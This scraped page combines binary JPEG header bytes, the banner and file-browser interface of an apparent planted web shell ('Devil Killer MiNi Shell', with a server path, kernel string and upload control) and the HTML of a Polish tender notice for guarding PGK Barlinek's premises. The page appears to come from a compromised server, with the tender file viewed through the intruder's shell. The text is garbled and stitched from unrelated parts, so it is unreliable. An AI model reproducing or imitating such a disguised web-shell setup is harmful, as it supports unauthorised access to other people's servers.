JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220207/0004848502-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Strzeżenie obiektów i mienia PGK Sp. z o. o. w Barlinku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210014755</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Barlinek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">957462311</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@pgkbarlinek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pgkbarlinek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o. </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Strzeżenie obiektów i mienia PGK Sp. z o. o. w Barlinku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9adb4f89-7437-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00048485</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mo-client/notices/08d9ea02-c845-b042-43d5-ab00019801c3 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">7.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (Dz. Urz. UE L 2016 Nr 119, str. l) informujemy:<br/>1.	Administratorem Państwa danych osobowych przetwarzanych w Przedsiębiorstwie Gospodarki Komunalnej w Barlinku jest Prezes Przedsiębiorstwa, ul. Szpitalna 4, 74-320 Barlinek, email: biuro@pgkbarlinek.pl.<br/>2.	Jeśli mają Państwo pytania dotyczące sposobu i zakresu przetwarzania danych osobowych możecie Państwo skontaktować się z Inspektorem Ochrony Danych: kontakt listowny na adres Administratora lub email: j.beben@pgkbarlinek.pl<br/>3.	Administrator przetwarza Państwa dane osobowe, zgodnie z art. 6 ust. 1 lit. b , lit.c, lit.f<br/>RODO w celu realizacji niniejszego postępowania przetargowego.<br/>4.	W związku z przetwarzaniem danych osobowych w celu, o których mowa w pkt. 3 odbiorcami Państwa danych osobowych mogą być podmioty uprawnione przepisami prawa oraz podmioty, które na podstawie zawartych umów przetwarzają dane osobowe w imieniu Administratora.<br/>5.	Państwa dane osobowe będą przetwarzane przez okres niezbędny do realizacji celów określonych w pkt. 3, a także przechowywane po tym czasie przez okres oraz w zakresie wymaganym przez przepisy obowiązującego prawa.<br/>6.	Dane osobowe Wykonawcy nie będą przekazywane do państwa trzeciego ani do organizacji międzynarodowej.<br/>7. W związku z przetwarzaniem danych osobowych przysługują Państwu następujące uprawnienia: prawo dostępu, w tym prawo do uzyskania kopii; prawo do żądania poprawiania, sprostowania; prawo do żądania usunięcia danych osobowych w przypadkach przewidzianych prawem; prawo do żądania ograniczenia przetwarzania danych osobowych; prawo do przenoszenia danych; prawo sprzeciwu wobec przetwarzania danych.<br/>8. W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu danych osobowych, przysługuje Państwu prawo wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych.<br/>9.	Podanie przez Państwa danych osobowych jest fakultatywne ( dobrowolne), ale niezbędne, w celu realizacji niniejszego stosunku umownego. Odmowa udostępniania danych przez Wykonawcę spowoduje konieczność rozwiązania umowy/zlecenia świadczenia usług pomiędzy Zamawiającym a Wykonawcą.<br/>10.	Dane osobowe Wykonawcy nie będą podlegały zautomatyzowaniu procesom podejmowania decyzji przez Zamawiającego, w tym profilowaniu przy realizacji niniejszej umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">02/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: „Strzeżenie obiektów i mienia PGK Sp. z o. o. w Barlinku”1.	Przedmiotem zamówienia jest świadczenie usług w zakresie strzeżenia obiektów i mienia w następujących obiektach PGK Sp. z o. o. w Barlinku:<br/>i.	siedziba PGK Sp. z o.o. w Barlinku ul. Szpitalna 4,<br/>ii.	Cmentarz Komunalny przy ul. Szosowej w Barlinku.<br/>2.	Miejsce świadczenia usługi oraz organizacja pracy:<br/>i.	ochrona fizyczna (1 osoba) siedziby PGK Sp. z o.o. w Barlinku, ul. Szpitalna 4 <br/>	w dni powszednie tj. poniedziałek, środa, piątek od godz. 0:00 do 07:00 i od 15:00 do 24:00 (16 godzin), we wtorek i czwartek od 00:00 do 07:00 i od 18:00 do 24:00 (13 godz.), w soboty od 0:00 do 08:00 i od 14:00 do 24:00 ( 17 godzin) oraz niedziele i dni świąteczne całodobowo.<br/>	obiekt na którym usytuowany jest siedziba PGK Sp. z o.o. jest ogrodzony z jedną bramą znajdującą się od ul. Szpitalnej.<br/>ii.	ochrona fizyczna (1 osoba) obiektów na terenie cmentarza komunalnego przy ul. Szosowej w Barlinku:<br/>iii.	w dni powszednie od godz. 0:00 do 07:00 i od godz. 15:00 do 24:00 ( 16 godzin), w soboty, niedziele i dni świąteczne całodobowo.<br/>	obiekt na którym usytuowany jest cmentarz komunalny jest ogrodzony z jedną bramą znajdującą się od ul. Szosowej.<br/>iii.	Łączna liczba roboczogodzin do ochrony wynosi planowo 8024, w tym:<br/>	Godziny ochrony cmentarza komunalnego przy ul. Szosowej: 2385<br/>	Godziny ochrony siedziby PGK Sp. z o.o. w Barlinku przy ul. Szpitalnej 4: 5639.<br/>3.	Zamawiający zastrzega sobie prawo do zmiany ilości chronionych obiektów w trakcie trwania umowy, tym samym do liczby godzin ochrony w miesiącu oraz miesięcznego wynagrodzenia. Zamawiający zobowiązuje się poinformować o rezygnacji z ochrony obiektu z 14 dniowym wyprzedzeniem, a w sytuacji zmiany ilości godzin na chronionych obiektach z zachowaniem 48 godzinnego wyprzedzenia.<br/>4.	Bezpośrednia ochrona fizyczna obiektów oznacza stałą obecność pracowników Wykonawcy ochraniających wyznaczony obiekt, w określonym czasie i miejscu w celu m.in.:<br/>a)	wykonywanie obchodów chronionych obiektów;<br/>b)	obsługi telewizji przemysłowej obiektu;<br/>c)	zapobieganie lub uniemożliwienie kradzieży bądź uszkodzenia powierzonego do ochrony mienia;<br/>d)	sprawdzanie wszystkich wejść i wyjść (po zakończeniu pracy jednostki, godzin otwarcia obiektu) mając na uwadze prawidłowe zabezpieczenie obiektu oraz przepisy p.poż., sprawdzenia czy na terenie obiektu nie pozostały osoby nieupoważnione;<br/>e)	zapobieganie wypadkom losowym, takim jak pożar lub awaria;<br/>f)	ujawnienie faktów dewastacji powierzonego do ochrony mienia;<br/>g)	zapobieganie lub uniemożliwienie przedostania się na teren chronionych obiektów osób nieupoważnionych;<br/>h)	powiadomienia osób odpowiedzialnych za ochronę obiektu i organów ścigania o czynach przestępczych zaistniałych na terenie ochranianych obiektów i zabezpieczenie miejsca ich popełnienia do czasu przybycia organów ścigania;<br/>i)	zapobiegania zakłóceniom porządku na terenie ochranianych obiektów oraz powiadomienia organów i osób odpowiedzialnych o zdarzeniach powodujących naruszenie porządku;<br/>j)	wykonywanie innych zadań i poleceń związanych z zapewnieniem bezpieczeństwa, porządku i ochrony mienia, wydawanych przez upoważnionego pracownika Zamawiającego. <br/>5.	Szczegółowe wymagania wykonania usługi ochrony mienia<br/>a)	Wykonawca kontroluje na bieżąco wykonanie usługi poprzez swój personel nadzoru, a także zgadza się na kontrolę pracy swoich pracowników przez upoważnionych przedstawicieli Zamawiającego.<br/>b)	Wykonawca oraz jego pracownicy ochrony zobowiązują się do zachowania w tajemnicy informacji uzyskanych w związku z wykonywaną umową, mających wpływ na stan bezpieczeństwa chronionego obiektu w czasie trwania umowy, jaki i po jej zakończeniu.<br/>c)	W razie zaistnienia kradzieży w chronionych przez Wykonawcę obiektach obowiązuje Strony umowy następujący tryb postępowania:<br/>i.	W przypadku stwierdzenia przez pracownika Wykonawcy jakiegokolwiek zagrożenia strzeżonego obiektu (włamanie) ma on obowiązek natychmiastowego powiadomienia w pierwszej kolejności odpowiednich służb (Straż Pożarną, Policję itp.) a następnie przedstawicieli Zamawiającego.<br/>ii.	W razie stwierdzenia kradzieży w strzeżonym obiekcie strona, której pracownicy stwierdzili kradzież, natychmiast zawiadamia druga stronę niniejszej umowy oraz Policję. W ciągu 24 godzin od momentu zaistnienia zdarzenia zawiadomienie to winno być potwierdzone na piśmie z określeniem ilości, rodzaju i przybliżonej wartości skradzionych przedmiotów (szkody).<br/>iii.	Wstępne dochodzenie oraz sporządzanie protokołu szkód winno odbywać się przy udziale Wykonawcy w ciągu 7 dni od daty włamania, kradzieży.<br/>iv.	Wykonawca odpowiada za szkody spowodowane kradzieżą z włamaniem lub pożarem tylko wówczas, jeśli w sposób nie budzący wątpliwości zostanie udowodniona jego wina przy wykonywaniu dozoru. Wykonawca odpowiada jednak tylko za szkody bezpośrednie, z wykluczeniem odpowiedzialności za utracony zysk i inną szkodę pośrednią. <br/>v.	Wykonawca nie odpowiada za szkody spowodowane w miejscu, do którego strażnik nie ma dostępu lub możliwości obserwacji. Wykonawca nie odpowiada za szkody spowodowane przez precyzyjne włamania np. drogą podkopu lub przez dach, względnie przez komin, jeżeli obiekt znajduje się w zwartej zabudowie. Wykonawca odpowiada jednak, jeżeli włamanie przez dach lub komin dokonane zostało do strzeżonego obiektu wolno stojącego.<br/>vi.	Wykonawca nie odpowiada za szkody w przypadku pozostania sprawcy szkody w zamkniętym obiekcie już w momencie obejmowania służby przez strażnika, o ile sprawca, który pozostał w obiekcie, wyniesie określone dobra materialne po otworzeniu obiektu przez pracowników Zamawiającego.<br/>vii.	Wykonawca nie odpowiada za szkody w przypadku, gdy sposób dokonania kradzieży lub wyrządzenia innej szkody wskazuje na to, że przestępstwa dokonali pracownicy Zamawiającego uprawnieni do wejścia na teren obiektu w czasie jego dozorowania, a rewizja nie należała do obowiązku strażnika. <br/>viii.	Wykonawca nie odpowiada za szkody powstałe wskutek niedopełnienia przez Zamawiającego obowiązków odnośnie zabezpieczania obiektu przed kradzieżą z włamaniem określonych w § 3. umowy.<br/>ix.	Wykonawca nie odpowiada za kradzież gotówki pozostawionej w strzeżonym obiekcie. Za kradzież akt, dokumentów, pieczęci i stempli oraz komputerów, maszyn do pisania i liczenia Wykonawca nie odpowiada, jeżeli po zakończeniu pracy pozostawiono je bez właściwego zamknięcia.<br/>x.	Wykonawca nie odpowiada za kradzież papierów wartościowych, biżuterii, kosztowności, srebra, złota, platyny i wyrobów z tych metali. <br/>xi.	Z kradzież gotówki z kasy Zamawiającego, Wykonawca odpowiada tylko do wysokości pogotowia kasowego.<br/>xii.	W razie odzyskania skradzionych przedmiotów, Zamawiający zobowiązany jest powiadomić o tym Wykonawcę.<br/>xiii.	Jeżeli Zamawiający odzyskał przedmioty w stanie niezmienionym, Wykonawca jest wolny od obowiązku wpłaty odszkodowania, a w razie gdy odszkodowanie zostało już wypłacone Zamawiający zobowiązany jest zwrócić Wykonawcy kwotę wypłaconego odszkodowania.<br/>xiv.	Jeżeli odzyskana część przedmiotów lub przedmioty znajdują się w stanie zmienionym ( zniszczone, uszkodzone) odszkodowanie ulega zmniejszeniu proporcjonalnie do obniżonej wartości odzyskanych przedmiotów.<br/>xv.	Ocenę wartości odzyskanych z kradzieży przedmiotów dokonuje Zamawiający i przekazuje ją Wykonawcy na piśmie.<br/>6.	Dodatkowe obowiązki Wykonawcy wchodzące w zakres zamówienia:<br/>a)	Wykonawca zobowiązuje się do zapewnienia właściwego użytkowania i pielęgnacji:<br/>i.	terenów zielonych (koszenie trawy, usuwanie chwastów, podlewanie) na Cmentarzu Komunalnym przy ul. Szosowej w Barlinku oraz na terenie siedziby Przedsiębiorstwa Gospodarki Komunalnej ul. Szpitalna 4 w Barlinku.<br/>ii.	odśnieżania i posypywania solą lub piaskiem dojść do chronionych obiektów<br/>iii.	zapewnienia ochrony obiektów (lustracja terenu)<br/>iv.	utrzymanie letnie i zimowe placów i chodników na terenie chronionych obiektów<br/>v.	prowadzenie akcji zimowej tj. powiadomienie służb dyżurnych o konieczności prowadzenia akcji oraz prowadzenie w tym zakresie rejestru.<br/>b)	Wykonawca zobowiązuje się do:<br/>i.	ochrony mienia i ogrodzenia, a w razie uszkodzeń ogrodzenia bieżącej jego naprawy<br/>ii.	zapoznania nowych pracowników z funkcjonowaniem zakładu oraz przedstawienia ich Prezesowi Zakładu.<br/>7.	Zamawiający na chronionych obiektach zapewnia pomieszczenia dla pracowników ochrony. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą<br/>liczbę punktów w kryterium Cena.<br/>Oferty nieodrzucone oceniane będą według wzoru:<br/>LP=najniższa cena brutto (zł)spośród ofert nie podlegających odrzuceniu / cena brutto badanej<br/>oferty(zł) x 100% x 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu w zakresie:<br/><br/>a) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/><br/>Warunek ten zostanie spełniony, jeżeli Wykonawca posiada aktualną koncesję na działalność gospodarczą w zakresie usług ochrony osób i mienia, wydaną przez Ministra Spraw Wewnętrznych i Administracji zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tekst jedn. Dz. U. z 2020 poz. 838 z późn. zm.).<br/><br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek będzie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/><br/><br/>b)zdolności technicznej lub zawodowej: <br/> <br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że należycie wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 2 (dwie) usługi w zakresie usługi ochrony osób i mienia (w ramach oddzielnych umów), na kwotę nie mniejszą niż 150 000,00 złotych brutto każda.<br/>Przez jedną usługę Zamawiający rozumie jeden/ą kontrakt/umowę.<br/>	Pod pojęciem „usługi wykonane” rozumie się usługi zrealizowane.<br/>	pod pojęciem „usługi wykonywane” rozumie się wykonywanie usług, z których pewna część została już wykonana (zrealizowana), w takim przypadku gdy usługi będą <br/>w trakcie wykonywania, Wykonawca zobowiązany jest wykazać, że od dnia rozpoczęcia wykonywania wykazanej usługi, na dzień składania ofert w niniejszym postępowaniu, zamówienie jest zrealizowane na kwotę co najmniej 150 000,00 złotych brutto,<br/>	W stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna), ww. warunek musi spełniać w całości jeden <br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia, tj. co najmniej dwie usługi ochronyz uwzględnieniem wszystkich parametrów w nim określonych. To samo dotyczy wykonawcy, który w celu spełnienia warunku udziału w postępowaniu będzie polegał na potencjale podmiotów udostępniających mu zasoby. W takim przypadku warunek udziału w postępowaniu musi spełniać w całości ten podmiot.<br/>	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>	W przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy Pzp, powyższe zastrzeżenie dotyczy również tych podmiotów,<br/>	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami, usługi o których mowa powyżej, dotyczą usług, <br/>w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, <br/>	W przypadku, gdy wartość dotycząca ww. warunku wyrażona będzie w walucie obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania. Za datę wszczęcia postępowania Zamawiający uznaje datę umieszczenia ogłoszenia w Biuletynie Zamówień Publicznych. Jeżeli w tym dniu średni kurs NBP nie będzie opublikowany Zamawiający przyjmie średni kurs <br/>z ostatniego dnia przed dniem ogłoszenia. <br/>2.	Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu zostanie dokonana na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	aktualną koncesję wydaną przez Ministerstwo Spraw Wewnętrznych <br/>i Administracji na prowadzenie działalności w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej, stałej ochrony fizycznej, na podstawie ustawy z dnia 22.8.1997 r. o ochronie osób i mienia (tekst jedn. Dz. U. z 2020 poz. 838 z późn. zm.).);<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument składa co najmniej jeden 